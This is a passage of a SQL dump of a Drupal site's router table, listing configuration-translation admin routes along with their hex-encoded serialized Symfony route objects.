6f6e746163745f666f726d223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133313a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35393a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.edit.entity.field_config.media_field_edit_form', '/admin/structure/media/manage/{media_type}/fields/{field_config}/translate/{langcode}/edit', '/admin/structure/media/manage/%/fields/%/translate/%/edit', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39303a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31323a226d656469615f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132373a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31303b7d7d, 10);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.edit.entity.field_config.node_field_edit_form', '/admin/structure/types/manage/{node_type}/fields/{field_config}/translate/{langcode}/edit', '/admin/structure/types/manage/%/fields/%/translate/%/edit', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38393a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31313a226e6f64655f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132363a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.edit.entity.field_config.taxonomy_term_field_edit_form', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/fields/{field_config}/translate/{langcode}/edit', '/admin/structure/taxonomy/manage/%/overview/fields/%/translate/%/edit', 1973, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3131313a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a32303a227461786f6e6f6d795f7465726d5f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3134383a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31363a222f6f766572766965772f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313937333b733a31343a227061747465726e4f75746c696e65223b733a36393a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31313b7d7d, 11),
('config_translation.item.edit.entity.field_config.user_field_edit_form', '/admin/config/people/accounts/fields/{field_config}/translate/{langcode}/edit', '/admin/config/people/accounts/fields/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37373a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31313a22757365725f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a226669656c645f636f6e666967223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130343a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c6473223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a226669656c645f636f6e666967223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35353a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.filter_format.edit_form', '/admin/config/content/formats/manage/{filter_format}/translate/{langcode}/edit', '/admin/config/content/formats/manage/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37383a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f7b66696c7465725f666f726d61747d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31333a2266696c7465725f666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a2266696c7465725f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130353a227b5e2f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a2266696c7465725f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35353a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.image_style.edit_form', '/admin/config/media/image-styles/manage/{image_style}/translate/{langcode}/edit', '/admin/config/media/image-styles/manage/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31313a22696d6167655f7374796c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130373a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.media_type.edit_form', '/admin/structure/media/manage/{media_type}/translate/{langcode}/edit', '/admin/structure/media/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36383a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31303a226d656469615f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39353a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
